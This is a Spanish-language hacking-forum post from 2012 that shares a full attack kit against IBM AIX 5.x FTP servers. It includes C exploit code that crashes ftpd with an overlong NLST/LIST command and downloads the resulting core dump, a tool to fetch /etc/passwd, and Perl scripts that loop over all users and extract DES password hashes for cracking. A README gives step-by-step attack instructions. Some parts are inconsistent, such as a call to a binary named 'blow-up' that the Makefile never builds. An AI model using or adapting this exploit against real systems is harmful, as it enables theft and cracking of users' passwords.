elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  [CODE|ATAQUE REMOTO] ub-aix-ftpd-attack IBM AIX 5.1, 5.2, 5.3, quiza anteriores
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [CODE|ATAQUE REMOTO] ub-aix-ftpd-attack IBM AIX 5.1, 5.2, 5.3, quiza anteriores  (Leído 3,172 veces)
D4RIO


Desconectado Desconectado

Mensajes: 1.004


U N I X


Ver Perfil WWW
[CODE|ATAQUE REMOTO] ub-aix-ftpd-attack IBM AIX 5.1, 5.2, 5.3, quiza anteriores
« en: 21 Enero 2012, 18:04 pm »

Hola, les dejo el código que hice para un ataque completo basado en el exploit de Kingcope. El volcado es de los hashes DES de AIX, los mismos que están en /etc/security/passwd.

Version: Version de prueba 1.0
Lenguajes: C, Perl
Sistemas Vulnerables: IBM AIX 5l - 5.1, 5.2, 5.3 y probablemente 4.X
Parche Existente: Si, http://aix.software.ibm.com/aix/efixes/security/ftpd_advisory.asc
Vulnerabilidad descubierta por: Kingcope
Nivel de compromiso: Todos los usuarios con FTP ven comprometido su hash DES, passwords fuertes no se ven comprometidos a corto plazo (John the Ripper tardará un poco más)
Información necesaria: Un usuario y password válido en el sistema. En algunos funcionará un default.
Datos adicionales: Estos sistemas también tienen una configuración por defecto de Sendmail que permite usarlos como Relay sin privilegios para el envío de correo electrónico.

Es una versión de prueba, no la probé luego de los últimos cambios. Se podría intentar borrar el core luego del ataque.


MAY THE SOURCE BE WITH YOU...


Archivo: README
Código:
This attack is based in:

 * IBM AIX 5l FTPd Remote DES Hash Exploit -- Advanced 'Datacenter' Edition :>
 *
 * Should work on IBM AIX 5.1,5.2,5.3! probably on 4.X too
 *
 * bug found & exploited by Kingcope

Credits for the vulnerability to Kingcope

Complete attack step by step:

  a) Build (make) in the LHOST (you) in a NEW directory
  b) Having a system's user/pass for AIX, use 'get-passwd' and get /etc/passwd by FTP
  c) Having /etc/passwd as 'passwd' in your LHOST, run ub-aix-ftpd-attack.pl

     This script reads passwd file getting usernames. Then, it uses provided valid
     user/pass for the exploit, wich dumps a 'core' forcing a segmentation fault in
     'FTPd'. Unpatched systems will dump core files containing the last failed
     login hash, from /etc/security/passwd, so we filled memory with our victim user.

     But the Kingcope exploit gets lots of strings from core files (by using 'strings' command),
     so this script uses lots of dumps then...
  d) Finally, you will get REAL hashes for users, by comparison, kicking off unusable
     strings from dumps, and getting a real copy of /etc/security/passwd for every
     user configured to FTPd... even root if it can FTP. To do this, use provided ukosh.pl

Now, a first eye on the passwords is done by running John the Ripper and stopping it after weakest passwords are revealed.

And you have all of the weak passwords instantly. Then, take a look at the retrieved passwd file
to see if you have some admin or potential staff member, or any interesting user.

If you don't have the pass, but the hash, use John the Ripper in a cluster, get some dictionary based on the system, you will crack it since... AIX cuts long passwords to 8 digits for the DES hash ;)


Archivo: Makefile
Código:
# it's for AIX (xlc), LINUX (gcc), or any other, just change CC
all: get-passwd exploit
CC:=gcc

get-passwd: get-passwd.c
@echo ">> compiling [$(CC)] $@"
@$(CC) -o get-passwd get-passwd.c

exploit: exploit.c
@echo ">> compiling [$(CC)] $@"
@$(CC) -o exploit exploit.c

clean:
-rm exploit get-passwd


Archivo: exploit.c
Código
  1. /*
  2.  * IBM AIX 5l FTPd Remote DES Hash Exploit -- Advanced 'Datacenter' Edition :>
  3.  *
  4.  * Should work on IBM AIX 5.1,5.2,5.3! probably on 4.X too
  5.  *
  6.  * bug found & exploited by Kingcope
  7.  * exploit modified by UnsafeBit to fit full system passwords attack
  8.  *
  9.  * Version 3.0 - January 2012
  10.  * ----------------------------------------------------------------------------
  11.  * Description:                                                               -
  12.  * The AIX 5l FTP-Server crashes when an overly long NLST command is supplied -
  13.  * For example: NLST ~AAAAA...A (2000 A's should be enough)                   -
  14.  * The fun part here is that it creates a coredump file in the current        -
  15.  * directory if it is set writable by the logged in user.                     -
  16.  * The goal of the exploit is to get the DES encrypted user hashes            -
  17.  * off the server. These can be later cracked with JtR.                       -
  18.  * This is accomplished by populating the memory with logins of the user      -
  19.  * we would like the encrypted hash from. Logging in three times with the     -
  20.  * target username should be enough so that the DES hash is included in the   -
  21.  * 'core' file.                                                               -
  22.  * The FTPd banner looks like below.                                          -
  23.  * 220 AIX5l FTP-Server (Version 4.1 Tue May 29 11:57:21 CDT 2001) ready.     -
  24.  * 220 AIX5l FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready.      -
  25.  * ----------------------------------------------------------------------------
  26.  */
  27.  
  28. #include <stdio.h>
  29. #include <stdlib.h>
  30. #include <string.h>
  31. #include <unistd.h>
  32. #include <sys/types.h>
  33. #include <sys/socket.h>
  34. #include <netdb.h>
  35. #include <fcntl.h>
  36.  
  37. #define RIDICULOUS_PASSWD "QqQqQqQq"
  38.  
  39. #define USAGE_STRING \
  40. "%s <-r rhost(victim)> <-l lhost(you)> [-p port] [-u username] [-k password]"\
  41. " [-d some rhost writable directory] [-c user to crack] [-s use 'LIST' command on AIX 5.3]\n"
  42.  
  43. int createconnection(char *target, char *targetport);
  44. void sockgetline(int socketd);
  45. void putline(int socketd, char *out);
  46. void usage(char *exe);
  47.  
  48. static int exploit_oops;
  49.  
  50. void exploit_say(char *sayit)
  51. {
  52. fprintf(stderr,"  + %s\n", sayit);
  53. }
  54.  
  55. void exploit_failed(char *sayit)
  56. {
  57. fprintf(stderr,"  - %s\n", sayit);
  58. exploit_oops++;
  59. }
  60.  
  61. char in[8096];
  62. char out[8096];
  63.  
  64. int main(int argc, char *argv[])
  65. {
  66. extern int optind;
  67. extern char *optarg;
  68. int haveuser=0,havepassword=0;
  69. int socketd,s2,nsock;
  70. int c,k,len;
  71. int fd;
  72.  
  73. exploit_oops = 0;
  74.  
  75. char *target = NULL;
  76. char *username = "ftp";
  77. char *password = "guest";
  78. char *writeto = "pub";
  79. char *crackme = "root";
  80. char *targetport = "21";
  81. int uselist = 0;
  82. char *myip = NULL;
  83. char *as = NULL;
  84. int octet_in[4], port;
  85. struct sockaddr_in yo, cli;
  86. char *oct = NULL;
  87.  
  88. while ((c = getopt(argc, argv, "r:l:p:u:k:d:c:s")) != EOF) {
  89. switch(c) {
  90. case 'r':
  91. target = (char*)malloc(strlen(optarg)+1);
  92. strcpy(target, optarg);
  93. break;
  94. case 'l':
  95. myip = (char*)malloc(strlen(optarg)+1);
  96. strcpy(myip, optarg);
  97. break;
  98. case 'p':
  99. targetport = (char*)malloc(strlen(optarg)+1);
  100. strcpy(targetport, optarg);
  101. break;
  102. case 'u':
  103. username = (char*)malloc(strlen(optarg)+1);
  104. strcpy(username, optarg);
  105. haveuser = 1;
  106. break;
  107. case 'k':
  108. password = (char*)malloc(strlen(optarg)+1);
  109. strcpy(password, optarg);
  110. havepassword = 1;
  111. break;
  112. case 'd':
  113. writeto = (char*)malloc(strlen(optarg)+1);
  114. strcpy(writeto, optarg);
  115. break;
  116. case 'c':
  117. crackme = (char*)malloc(strlen(optarg)+1);
  118. strcpy(crackme, optarg);
  119. break;
  120. case 's':
  121. uselist = 1;
  122. break;
  123. default:
  124. usage(argv[0]);
  125. }
  126. }
  127.  
  128. if (target == NULL || myip == NULL)
  129. usage(argv[0]);
  130.  
  131. if ((haveuser && !havepassword) || (!haveuser && havepassword)) {
  132. usage(argv[0]);
  133. }
  134.  
  135. socketd = createconnection(target, targetport);
  136. sockgetline(socketd);
  137.  
  138. exploit_say("forcing poor FTPd to load DES hash in memory");
  139.  
  140. for (k=0;k<3;k++) {
  141. snprintf(out, sizeof out, "USER %s\r\n", crackme);
  142. putline(socketd, out);
  143. sockgetline(socketd);
  144. snprintf(out, sizeof out, "PASS "RIDICULOUS_PASSWD"\r\n");
  145. putline(socketd,out);
  146. sockgetline(socketd);
  147. }
  148.  
  149. snprintf(out, sizeof out, "USER %s\r\n", username);
  150. putline(socketd, out);
  151. sockgetline(socketd);
  152. snprintf(out, sizeof out, "PASS %s\r\n", password);
  153. putline(socketd,out);
  154. sockgetline(socketd);
  155. sockgetline(socketd);
  156.  
  157. exploit_say("injecting venom");
  158.  
  159. snprintf(out, sizeof out, "CWD %s\r\n", writeto);
  160. putline(socketd, out);
  161. sockgetline(socketd);
  162.  
  163. as = (char*)malloc(2000);
  164. memset(as, 'A', 2000);
  165. as[2000-1] = 0;
  166.  
  167. if (!uselist) {
  168. snprintf(out, sizeof out, "NLST ~%s\r\n", as);
  169. } else {
  170. /* AIX 5.3 trigger - thanks to karol */
  171. snprintf(out, sizeof out, "LIST ~%s\r\n", as);
  172. }
  173. putline(socketd, out);
  174.  
  175. memset(in, '\0', sizeof in);
  176. if (recv(socketd, in, sizeof in, 0) < 1) {
  177. exploit_say("exploit succeeded!");
  178. } else {
  179. exploit_say("trigger seems to have failed, proceeding anyways (sometimes, it will work anyways)");
  180. }
  181. sleep(5);
  182.  
  183. close(socketd);
  184.  
  185. socketd = createconnection(target, targetport);
  186. sockgetline(socketd);
  187.  
  188. snprintf(out, sizeof out, "USER %s\r\n", username);
  189. putline(socketd, out);
  190. sockgetline(socketd);
  191. snprintf(out, sizeof out, "PASS %s\r\n", password);
  192. putline(socketd,out);
  193. sockgetline(socketd);
  194. sockgetline(socketd);
  195.  
  196. snprintf(out, sizeof out, "CWD %s\r\n", writeto);
  197. putline(socketd, out);
  198. sockgetline(socketd);
  199.  
  200. exploit_say("getting core file");
  201.  
  202. snprintf(out, sizeof out, "TYPE I\r\n");
  203. putline(socketd, out);
  204. sockgetline(socketd);
  205.  
  206. port = getpid() + 1024;
  207. len = sizeof(cli);
  208.  
  209. bzero(&yo, sizeof(yo));
  210. yo.sin_family = AF_INET;
  211. yo.sin_port=htons(port);
  212. yo.sin_addr.s_addr = htonl(INADDR_ANY);
  213.  
  214. oct=(char *)strtok(myip,".");
  215. octet_in[0]=atoi(oct);
  216. oct=(char *)strtok(NULL,".");
  217. octet_in[1]=atoi(oct);
  218. oct=(char *)strtok(NULL,".");
  219. octet_in[2]=atoi(oct);
  220. oct=(char *)strtok(NULL,".");
  221. octet_in[3]=atoi(oct);
  222.  
  223. snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
  224. putline(socketd, out);
  225. sockgetline(socketd);
  226.  
  227. if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  228. perror("socket");
  229. return -1;
  230. }
  231.  
  232. if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) {
  233. perror("bind");
  234. close(s2);
  235. exit(1);
  236. }
  237.  
  238. if (listen(s2, 10) < 0) {
  239. perror("listen");
  240. close(s2);
  241. exit(1);
  242. }
  243.  
  244. snprintf(out, sizeof out, "RETR core\r\n");
  245. putline(socketd, out);
  246. sockgetline(socketd);
  247. if (strstr(in, "150") == NULL) {
  248. exploit_failed("core file not found... terminating");
  249. close(socketd);
  250. exit(1);
  251. }
  252.  
  253. fd = open("core", O_WRONLY | O_CREAT);
  254. if (fd == -1) {
  255. perror("open on local core file");
  256. close(socketd);
  257. exit(1);
  258. }
  259.  
  260. sleep(1);
  261.  
  262. if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) {
  263. perror("accept");
  264. close(socketd);
  265. exit(1);
  266. }
  267.  
  268. do {
  269. k = recv(nsock, in, sizeof in, 0);
  270. if (k < 1) break;
  271. write(fd, in, k);
  272. } while (k > 0);
  273.  
  274. close(nsock);
  275. close(fd);
  276. close(socketd);
  277.  
  278. exploit_say("extracting DES hashes");
  279.  
  280. char strings_command[255];
  281. memset(strings_command, 0, sizeof strings_command);
  282. sprintf(strings_command, "chmod 754 core");
  283. system(strings_command);
  284.  
  285. memset(strings_command, 0, sizeof strings_command);
  286. fprintf(stderr, "+ command: '%s'\n", strings_command);
  287. system(strings_command);
  288.  
  289. return 0;
  290. }
  291.  
  292. int createconnection(char *target, char *targetport) {
  293. struct addrinfo hints, *res;
  294. int socketd;
  295.  
  296. memset(&hints, 0, sizeof hints);
  297. hints.ai_family = AF_UNSPEC;
  298. hints.ai_socktype = SOCK_STREAM;
  299.  
  300. if (getaddrinfo(target, targetport, &hints, &res)) {
  301. perror("getaddrinfo");
  302. exit(1);
  303. }
  304.  
  305. socketd = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
  306. if (socketd < 0) {
  307. perror("socket");
  308. exit(1);  
  309. }
  310.  
  311. if (connect(socketd, res->ai_addr, res->ai_addrlen) < 0) {
  312. perror("connect");
  313. exit(1);
  314. }
  315.  
  316. return socketd;
  317. }
  318.  
  319. void sockgetline(int socketd)
  320. {
  321. memset(in, '\0', sizeof in);
  322. if (recv(socketd, in, sizeof in, 0) < 1) {
  323. perror("recv");
  324. close(socketd);
  325. exit(1);
  326. }
  327. }
  328.  
  329. void putline(int socketd, char *out) {
  330.  
  331. if (send(socketd, out, strlen(out), 0) == -1) {
  332. perror("send");
  333. close(socketd);
  334. exit(1);
  335. }
  336. }
  337.  
  338. void usage(char *exe)
  339. {
  340. fprintf(stderr, USAGE_STRING, exe);
  341. exit(0);
  342. }
  343.  


Archivo: get-passwd.c
Código
  1. /*
  2.  * IBM AIX 5l FTPd Remote DES Hash Exploit
  3.  * This file will use a known user to get /etc/passwd file
  4.  *
  5.  * Should work on IBM AIX 5.1,5.2,5.3! probably on 4.X too
  6.  *
  7.  * Version 1.0 - Jan 2012
  8.  * ----------------------------------------------------------------------------
  9.  */
  10.  
  11. #include <stdio.h>
  12. #include <stdlib.h>
  13. #include <string.h>
  14. #include <unistd.h>
  15. #include <sys/types.h>
  16. #include <sys/socket.h>
  17. #include <netdb.h>
  18. #include <fcntl.h>
  19.  
  20. #define USAGE_STRING \
  21. "%s <-r rhost(victim)> <-l lhost(you)> [-p port] [-u username] [-k password]"
  22.  
  23. int createconnection(char *target, char *targetport);
  24. void sockgetline(int socketd);
  25. void putline(int socketd, char *out);
  26. void usage(char *exe);
  27.  
  28. static int exploit_oops;
  29.  
  30. void exploit_say(char *sayit)
  31. {
  32. fprintf(stderr,"  + %s\n", sayit);
  33. }
  34.  
  35. void exploit_failed(char *sayit)
  36. {
  37. fprintf(stderr,"  - %s\n", sayit);
  38. exploit_oops++;
  39. }
  40.  
  41. char in[8096];
  42. char out[8096];
  43.  
  44. int main(int argc, char *argv[])
  45. {
  46. extern int optind;
  47. extern char *optarg;
  48. int haveuser=0,havepassword=0;
  49. int socketd,s2,nsock;
  50. int c,k,len;
  51. int fd;
  52.  
  53. exploit_oops = 0;
  54.  
  55. char *target = NULL;
  56. char *username = "ftp";
  57. char *password = "guest";
  58. char *writeto = "pub";
  59. char *targetport = "21";
  60. char *myip = NULL;
  61. char *as = NULL;
  62. int octet_in[4], port;
  63. struct sockaddr_in yo, cli;
  64. char *oct = NULL;
  65.  
  66. while ((c = getopt(argc, argv, "r:l:p:u:k:")) != EOF) {
  67. switch(c) {
  68. case 'r':
  69. target = (char*)malloc(strlen(optarg)+1);
  70. strcpy(target, optarg);
  71. break;
  72. case 'l':
  73. myip = (char*)malloc(strlen(optarg)+1);
  74. strcpy(myip, optarg);
  75. break;
  76. case 'p':
  77. targetport = (char*)malloc(strlen(optarg)+1);
  78. strcpy(targetport, optarg);
  79. break;
  80. case 'u':
  81. username = (char*)malloc(strlen(optarg)+1);
  82. strcpy(username, optarg);
  83. haveuser = 1;
  84. break;
  85. case 'k':
  86. password = (char*)malloc(strlen(optarg)+1);
  87. strcpy(password, optarg);
  88. havepassword = 1;
  89. break;
  90. default:
  91. usage(argv[0]);
  92. }
  93. }
  94.  
  95. if (target == NULL || myip == NULL)
  96. usage(argv[0]);
  97.  
  98. if ((haveuser && !havepassword) || (!haveuser && havepassword)) {
  99. usage(argv[0]);
  100. }
  101.  
  102. socketd = createconnection(target, targetport);
  103. sockgetline(socketd);
  104. snprintf(out, sizeof out, "USER %s\r\n", username);
  105. putline(socketd, out); /* username */
  106. sockgetline(socketd);
  107. snprintf(out, sizeof out, "PASS %s\r\n", password);
  108. putline(socketd,out);  /* passwd */
  109. sockgetline(socketd);
  110. sockgetline(socketd);
  111.  
  112. exploit_say("RETRIEVING /etc/passwd");
  113.  
  114. snprintf(out, sizeof out, "CWD /etc\r\n");
  115. putline(socketd, out);
  116. sockgetline(socketd);
  117.  
  118. snprintf(out, sizeof out, "TYPE I\r\n");
  119. putline(socketd, out);
  120. sockgetline(socketd);
  121.  
  122. port = getpid() + 1024;
  123. len = sizeof(cli);
  124.  
  125. bzero(&yo, sizeof(yo));
  126. yo.sin_family = AF_INET;
  127. yo.sin_port=htons(port);
  128. yo.sin_addr.s_addr = htonl(INADDR_ANY);
  129.  
  130. oct=(char *)strtok(myip,".");
  131. octet_in[0]=atoi(oct);
  132. oct=(char *)strtok(NULL,".");
  133. octet_in[1]=atoi(oct);
  134. oct=(char *)strtok(NULL,".");
  135. octet_in[2]=atoi(oct);
  136. oct=(char *)strtok(NULL,".");
  137. octet_in[3]=atoi(oct);
  138.  
  139. snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
  140. putline(socketd, out);
  141. sockgetline(socketd);
  142.  
  143. if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  144. perror("socket");
  145. return -1;
  146. }
  147.  
  148. if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) {
  149. perror("bind");
  150. close(s2);
  151. exit(1);
  152. }
  153.  
  154. if (listen(s2, 10) < 0) {
  155. perror("listen");
  156. close(s2);
  157. exit(1);
  158. }
  159.  
  160. snprintf(out, sizeof out, "RETR passwd\r\n");
  161. putline(socketd, out);
  162. sockgetline(socketd);
  163. if (strstr(in, "150") == NULL) {
  164. exploit_failed("passwd file not found... terminating");
  165. close(socketd);
  166. exit(1);
  167. }
  168.  
  169. fd = open("passwd", O_WRONLY | O_CREAT);
  170. if (fd == -1) {
  171. perror("open on local passwd file");
  172. close(socketd);
  173. exit(1);
  174. }
  175.  
  176. sleep(1);
  177.  
  178. if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) {
  179. perror("accept");
  180. close(socketd);
  181. exit(1);
  182. }
  183.  
  184. do {
  185. k = recv(nsock, in, sizeof in, 0);
  186. if (k < 1) break;
  187. write(fd, in, k);
  188. } while (k > 0);
  189.  
  190. close(nsock);
  191. close(fd);
  192. close(socketd);
  193.  
  194. return 0;
  195. }
  196.  
  197. int createconnection(char *target, char *targetport) {
  198. struct addrinfo hints, *res;
  199. int socketd;
  200.  
  201. memset(&hints, 0, sizeof hints);
  202. hints.ai_family = AF_UNSPEC;
  203. hints.ai_socktype = SOCK_STREAM;
  204.  
  205. if (getaddrinfo(target, targetport, &hints, &res)) {
  206. perror("getaddrinfo");
  207. exit(1);
  208. }
  209.  
  210. socketd = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
  211. if (socketd < 0) {
  212. perror("socket");
  213. exit(1);  
  214. }
  215.  
  216. if (connect(socketd, res->ai_addr, res->ai_addrlen) < 0) {
  217. perror("connect");
  218. exit(1);
  219. }
  220.  
  221. return socketd;
  222. }
  223.  
  224. void sockgetline(int socketd)
  225. {
  226. memset(in, '\0', sizeof in);
  227. if (recv(socketd, in, sizeof in, 0) < 1) {
  228. perror("recv");
  229. close(socketd);
  230. exit(1);
  231. }
  232. }
  233.  
  234. void putline(int socketd, char *out) {
  235.  
  236. if (send(socketd, out, strlen(out), 0) == -1) {
  237. perror("send");
  238. close(socketd);
  239. exit(1);
  240. }
  241. }
  242.  
  243. void usage(char *exe)
  244. {
  245. fprintf(stderr, USAGE_STRING, exe);
  246. exit(0);
  247. }
  248.  


Archivo: ub-aix-ftpd-attack.pl
Código
  1. #!/usr/bin/env perl
  2.  
  3.  
  4. die "need arguments: <LHOST> <RHOST> <VALID_USER> <VALID_PASSWORD>" unless (scalar @ARGV eq 4);
  5. my $F;
  6. open F, "< passwd";
  7. while (<F>) {
  8. ($login, $passwd, $uid, $gid,
  9. $gcos, $home, $shell) = split(/:/);
  10. print "+ E X P L O I T I N G   U S E R :         [$login]\n";
  11. system("./blow-up -r $ARGV[1] -l $ARGV[0] -u $ARGV[2] -k $ARGV[3] -d /tmp -c $login");
  12. }
  13.  


Archivo: ukosh.pl
Código
  1. #!/usr/bin/env perl
  2. #
  3. # 'unlock core shadows' (ukosh.pl) takes corefile 13 digit strings
  4. # from AIX 5.2 vulnerable FTPd hashdumps and, by comparison, takes
  5. # candidate user hashes
  6. #
  7. # you can do it yourself, but this script can take an /etc/passwd dump
  8. # for thousands of users, and get hashes in a second, so you can just
  9. # start cracking (John the Ripper in a cluster is the fastest way)
  10. #
  11. # %crack_user = ( username => '$',
  12. #                 complete_list  => '@', ); # each user has lots of "maybe" passwords
  13. our @users_data; # the array of 'crack_user' elements
  14. our $number_of_files = 0;
  15. our @word_hash; # array of word-times, if a word appears in almost all of the files
  16.                # then it is a core residual string, but not a password hash
  17.  
  18. use IO::Handle;
  19.  
  20. sub map_user() {
  21. ($trash,$username) = split(/\./,$_[0]);
  22. our $number_of_files++;
  23. our @users_data;
  24. my @list;
  25. my %crack_user;
  26. my $File;
  27. open File, "< $_[0]" || die "cannot open $_[0]";
  28. while (<File>) {
  29. chomp($_);
  30. push @list, $_ unless (/^$/);
  31. }
  32. close F;
  33. $crack_user{complete_list}=\@list;
  34. $crack_user{username}=$username;
  35. push @users_data, \%crack_user unless ($crack_user{username}=~/^$/);
  36. }
  37.  
  38. sub sum_word() {
  39. my %word_times; my $found;
  40.  
  41. #print "size of array: ", scalar @word_hash, "\n"
  42. $found=0;
  43. die "need a word, wht! [$_[0]]\n" if $_[0] =~ /^$/;
  44. for my $ix ( 0..scalar @word_hash ) {
  45. if ( $word_hash[$ix]->{word} =~ /^$_[0]$/ ) {
  46. $word_hash[$ix]->{times}++;
  47. $found=1;
  48. }
  49. }
  50. if ($found eq 0) {
  51. if ($_[0] =~ /^$/) {
  52. }
  53. else {
  54. $word_times{word}=$_[0];
  55. $word_times{times}=1;
  56. push @word_hash, \%word_times;
  57. }
  58. }
  59. }
  60.  
  61. opendir(my $this_dir, ".") or die "cannot open current dir";
  62.  
  63. print "reading directory ";
  64. while(readdir $this_dir) {
  65. print ".";
  66. flush STDOUT;
  67. # each password file will be attended
  68. &map_user($_) if (/^passwd\.[a-z|0-9]+$/);
  69. }
  70. print "\nloaded $number_of_files files\n";
  71. print "mapping and counting words ";
  72. closedir $this_dir;
  73.  
  74. # fills comparison hash
  75. for $i ( 0..scalar @users_data ) {
  76. printf ".";
  77. flush STDOUT;
  78. for (@{$users_data[$i]->{complete_list}}) {
  79. &sum_word($_);
  80. }
  81. }
  82.  
  83. print "\nguessing /etc/security/passwd file?   }:)\n";
  84. # for each possible line
  85. my $SEC_PASSWD; my $CAN_WRITE=1;
  86. open SEC_PASSWD, "> security-passwd" || $CAN_WRITE=0;
  87.  
  88. if ($CAN_WRITE eq 1) {
  89. print "writing to file 'security-passwd'...\n";
  90. }
  91.  
  92. print "---------------------------------------------\n";
  93. for $i ( 0..scalar @users_data ) {
  94. for (@{$users_data[$i]->{complete_list}}) {
  95. for my $ix ( 0..scalar @word_hash ) {
  96. if ($word_hash[$ix]->{word} !~ /^$/){
  97. if ($word_hash[$ix]->{word} =~ /^$_$/){
  98. if ($word_hash[$ix]->{times} eq 1) {
  99. print "$users_data[$i]->{username}:$word_hash[$ix]->{word}\n";
  100. if ($CAN_WRITE eq 1) {
  101. print SEC_PASSWD "$users_data[$i]->{username}:$word_hash[$ix]->{word}\n";
  102. }
  103. }
  104. }
  105. }
  106. }
  107. }
  108. }
  109. close SEC_PASSWD;
  110. print "---------------------------------------------\n";
  111.  



Espero comentarios, mejoras, etc...
Saludos y Happy Hacking
« Última modificación: 24 Enero 2012, 17:38 pm por D4RIO » En línea

OpenBSDFreeBSD
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ataque DOS Attack (uso educativo)
Hacking
Banker25 1 3,856 Último mensaje 8 Mayo 2011, 22:40 pm
por xassiz~
Ataque Pixie Dust Attack y Ataque Blackjack « 1 2 »
Wireless en Linux
ChimoC 10 11,860 Último mensaje 2 Abril 2015, 11:34 am
por sanson
PixieScript v2.1, ataque automátizado Pixie Dust Attack « 1 2 »
Wireless en Linux
ChimoC 10 17,504 Último mensaje 3 Septiembre 2018, 09:08 am
por BgCRaCK
PixieScript v2.5, ataque automatizado Pixie Dust Attack
Wireless en Linux
El_Andaluz 0 5,496 Último mensaje 26 Abril 2015, 06:09 am
por El_Andaluz
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines